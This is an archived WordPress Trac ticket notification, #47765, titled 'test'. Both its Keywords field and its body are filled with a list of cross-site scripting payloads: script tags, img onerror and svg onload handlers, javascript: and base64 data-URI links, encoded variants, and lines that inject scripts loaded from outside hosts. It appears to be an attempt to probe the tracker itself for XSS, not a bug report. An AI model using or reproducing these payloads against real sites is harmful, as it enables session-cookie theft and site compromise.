[wp-trac] [WordPress Trac] #47765: test
WordPress Trac
noreply at wordpress.org
Tue Jul 23 11:11:02 UTC 2019
#47765: test
-------------------------+-------------------------------------------------
Reporter: ph3n1x | Owner: (none)
Type: defect | Status: new
(bug) |
Priority: normal | Milestone: Awaiting Review
Component: HTTP API | Version:
Severity: trivial | Keywords: ><script>alert(1);</script>
| "><script>alert('document.cookie');</script>
| <script>alert("XSS at " +
| document.domain)</script>
| %3Cimg+src%3Dx+onerror%3Dprompt(document.domain)%3B%3E
| <html><body><script>alert(document.domain)</script></body></html>
| <svg/onload=prompt(document.domain)> '><img
| src=x onerror=alert('BoomXSS!')> "><img src=x
| onerror=prompt(document.domain)> <h1>XSS:)</h1>
| <href="url" onmouseover=alert(1)>
| alert(document.domain)});}}%3C/script%3E
| a"</li><iframe/onload=alert(document.domain)>
| */alert(document.domain);/* "><img src=x
| onerror=prompt(/XSS/);> "><img src=x
| onerror=prompt(navigator.userAgent);> "><img
| src=x onerror=prompt(1)> "><img src=x
| onerror=alert(document.domain)>
| javascript:alert(document.domain)
| <script>alert(String.fromCharCode(88 83
| 83))</script>
| <script>prompt(document.domain)</script>
| <script>document.write('<script
| src=http://trylangthis.site88.net/xss.js></scr'
| + 'ipt>')</script>
| <script>document.write('<script
| src=http://yourjavascript.com/18445241181/evilsciprt.js></scr'
| + 'ipt>')</script>
| http://yourjavascript.com/18445241181/evilsciprt.js
| <div><script>alert(document.domain)</script></div>
| <div><img src=x
| onerror=prompt(document.domain);></div>
| #?gad=xxxx"onload="alert(document.domain)" ----
| Try on GOOGLE ONLY depending on parameters
| </script><body onload=alert(document.domain)>
| t" onmouseover=alert(document.domain); a="
| 09179753489 <IFRAME
| SRC="javascript:alert(document.domain);"></IFRAME>
| <IFRAMESRC=data:text/html;base64
| Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbX
| B0KGRvY3VtZW50LmRvbWFpbik7Pg=="></IFRAME> <a
| href="data:text/html;base64
| Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY
| 3VtZW50LmRvbWFpbik7Pg==#">Continue</a> <a
| href=”javascript:alert(document.domain);”>Continue</a>
| <href="url" onmouseover=alert(document.domain)>
| t" onmouseover=alert(document.domain); a=" t"
| onmouseover=alert(document.domain); a=" t"
| onmouseover=alert(document.cookie); a=" <a
| href=”javascript:alert(document.domain);”>Continue</a>
| <a href='javascript:alert(document.domain)'
| onmouseover=alert(document.domain) >XSS :)</a>
| <a href=”data:text/html;base64
| PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
| #”>Continue</a> <a
| href="<script>alert(document.domain)</script>">XSS
| :)</a> <a href=”javascript:alert(0);”></a>
| continue=../javascript:alert(0); "/> <img
| src='aaa' onerror=alert(document.domain)> <img
| src="<img
| src=search"/onerror=alert(document.domain)//">
| <h1 onclick="alert(123)">123</h1> <h1
| onmouseover="alert(document.domain)">haha</h1>
| "><svg onload="prompt(document.domain);"> <IMG
| SRC=javascript:alert(String.fromCharCode(88 83
| 83))> alert(String.fromCharCode(88 83 83))
| %22?%?3E?%?3Cimg?%?20src?%?3Dx?%?20onerror?%?3Dprompt?%?281?%?
| 29?%?3B?%?3E "><img src=x
| onerror=prompt(document.domain);> <img
| src=x onerror=alert(1)><img class="emoji"
| alt="😯" src="x" /><svg
| onload=prompt(document.domain)><img
| class="emoji" alt="😯" src="x" /><svg
| onload=prompt(document.domain)>> "> <img
| class="emoji" alt=":hushed:" src="x" /><svg
| onload=prompt(document.domain)> <img
| class="emoji" alt=":hushed:" src="x" /><svg
| onload=prompt(document.domain)> "><img src=x
| onerror=alert(document.domain)> <href="url"
| onmouseover=alert(document.domain)> t"
| onmouseover=alert(document.domain); a=" <h1
| onclick="alert(123)">123</h1> <h1
Focuses: | onmouseover="alert(document.domain)">haha</h1>
-------------------------+-------------------------------------------------
"><script>alert(1);</script> "><script>alert('document.cookie');</script>
<script>alert("XSS at " + document.domain)</script>
%3Cimg+src%3Dx+onerror%3Dprompt(document.domain)%3B%3E
<html><body><script>alert(document.domain)</script></body></html>
<svg/onload=prompt(document.domain)> '><img src=x
onerror=alert('BoomXSS!')> "><img src=x onerror=prompt(document.domain)>
<h1>XSS:)</h1> <href="url" onmouseover=alert(1)>
alert(document.domain)});}}%3C/script%3E
a"</li><iframe/onload=alert(document.domain)> */alert(document.domain);/*
"><img src=x onerror=prompt(/XSS/);> "><img src=x
onerror=prompt(navigator.userAgent);> "><img src=x onerror=prompt(1)>
"><img src=x onerror=alert(document.domain)>
javascript:alert(document.domain) <script>alert(String.fromCharCode(88,
83, 83))</script> <script>prompt(document.domain)</script>
<script>document.write('<script
src=http://trylangthis.site88.net/xss.js></scr' + 'ipt>')</script>
<script>document.write('<script
src=http://yourjavascript.com/18445241181/evilsciprt.js></scr' +
'ipt>')</script> http://yourjavascript.com/18445241181/evilsciprt.js
<div><script>alert(document.domain)</script></div> <div><img src=x
onerror=prompt(document.domain);></div>
#?gad=xxxx"onload="alert(document.domain)" ---- Try on GOOGLE ONLY,
depending on parameters </script><body onload=alert(document.domain)> t"
onmouseover=alert(document.domain); a=" 09179753489 <IFRAME
SRC="javascript:alert(document.domain);"></IFRAME>
<IFRAMESRC=data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbX
B0KGRvY3VtZW50LmRvbWFpbik7Pg=="></IFRAME> <a
href="data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY
3VtZW50LmRvbWFpbik7Pg==#">Continue</a> <a
href=”javascript:alert(document.domain);”>Continue</a> <href="url"
onmouseover=alert(document.domain)> t" onmouseover=alert(document.domain);
a=" t" onmouseover=alert(document.domain); a=" t"
onmouseover=alert(document.cookie); a=" <a
href=”javascript:alert(document.domain);”>Continue</a> <a
href='javascript:alert(document.domain)'
onmouseover=alert(document.domain) >XSS :)</a> <a
href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
#”>Continue</a> <a href="<script>alert(document.domain)</script>">XSS
:)</a> <a href=”javascript:alert(0);”></a>
continue=../javascript:alert(0); "/> <img src='aaa'
onerror=alert(document.domain)> <img src="<img
src=search"/onerror=alert(document.domain)//"> <h1
onclick="alert(123)">123</h1> <h1
onmouseover="alert(document.domain)">haha</h1> "><svg
onload="prompt(document.domain);"> <IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>
alert(String.fromCharCode(88, 83, 83))
%22?%?3E?%?3Cimg?%?20src?%?3Dx?%?20onerror?%?3Dprompt?%?281?%?
29?%?3B?%?3E "><img src=x onerror=prompt(document.domain);>
<img src=x onerror=alert(1)><img class="emoji" alt="😯" src="x"
/><svg onload=prompt(document.domain)><img class="emoji" alt="😯" src="x"
/><svg onload=prompt(document.domain)>>
">
<img class="emoji" alt=":hushed:" src="x" /><svg
onload=prompt(document.domain)>
<img class="emoji" alt=":hushed:" src="x" /><svg
onload=prompt(document.domain)>
"><img src=x onerror=alert(document.domain)>
<href="url" onmouseover=alert(document.domain)>
t" onmouseover=alert(document.domain); a="
<h1 onclick="alert(123)">123</h1> <h1
onmouseover="alert(document.domain)">haha</h1>
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47765>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform